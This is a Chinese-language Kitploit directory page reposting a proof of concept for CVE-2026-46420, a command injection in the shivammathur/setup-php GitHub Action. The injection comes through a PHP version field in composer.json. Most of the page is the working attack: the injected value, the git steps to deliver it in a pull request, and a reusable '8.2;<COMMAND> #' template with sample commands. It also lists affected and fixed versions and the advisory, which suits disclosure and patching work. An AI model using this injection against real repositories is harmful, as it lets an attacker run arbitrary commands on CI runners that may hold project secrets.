Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-46420 — CVE-2026-46420 的 PoC,通过仓库控制的 PHP 版本解析在 shivammathur/setup-php 中实现命令注入。 | Kitploit
工具/GitHubGitHub/jvr2022/cve-2026-46420
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制Payload 开发
GitHubjvr2022/cve-2026-46420

CVE-2026-46420

CVE-2026-46420 的 PoC,通过仓库控制的 PHP 版本解析在 shivammathur/setup-php 中实现命令注入。

查看仓库
1101个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-46420 PoC

当 PHP 版本从仓库控制的文件中加载时,shivammathur/setup-php 中存在命令注入。

受影响:

root@kitploit:~
>= 2.25.0, < 2.37.1

已修复:

root@kitploit:~
>= 2.37.1

PoC

目标仓库已经有一个存在漏洞的工作流,该工作流会检出拉取请求内容并运行 [email protected]。

攻击者仅修改 composer.json。

root@kitploit:~
-"php": "8.2"
+"php": [
+  "8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #"
+]

当 setup-php 从 composer.json 读取 PHP 版本时,注入的命令会被包含在生成的 shell 脚本中并执行。

结果:

root@kitploit:~
-FEATURE_FLAG=off
+FEATURE_FLAG=modified-by-poc

复现

从目标仓库创建一个分支:

root@kitploit:~
git checkout -b poc-test

将干净的 composer.json 替换为 PoC 版本:

root@kitploit:~
cp attacker/composer.json composer.json

提交并推送:

root@kitploit:~
git add composer.json
git commit -m "更新 composer 配置"
git push -u origin poc-test

从 poc-test 向 main 打开一个拉取请求。

Actions 运行应显示 demo-app/.env.example 在 setup-php 步骤期间被修改。

修改命令

payload 格式为:

root@kitploit:~
8.2;<COMMAND> #

当前 payload:

root@kitploit:~
8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #

执行的命令是:

root@kitploit:~
sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example

要更改 PoC 的行为,请替换 8.2; 和 # 之间的命令。

创建一个文件:

root@kitploit:~
8.2;touch poc-executed #

写入文件:

root@kitploit:~
8.2;printf 'poc executed\n' > poc-result.txt #

打印命令输出:

root@kitploit:~
8.2;id #

示例 composer.json:

root@kitploit:~
{
  "config": {
    "platform": {
      "php": [
        "8.2;touch poc-executed #"
      ]
    }
  }
}

修复

升级到 [email protected] 或更高版本。

相同的 payload 在打过补丁的版本上会被拒绝。

参考

https://github.com/shivammathur/setup-php/security/advisories/GHSA-pqwm-q9pv-ph8r

https://github.com/shivammathur/setup-php/commit/eeef37e059fb5368a5bc8ed8ce45ff54bd39b80b

下载工具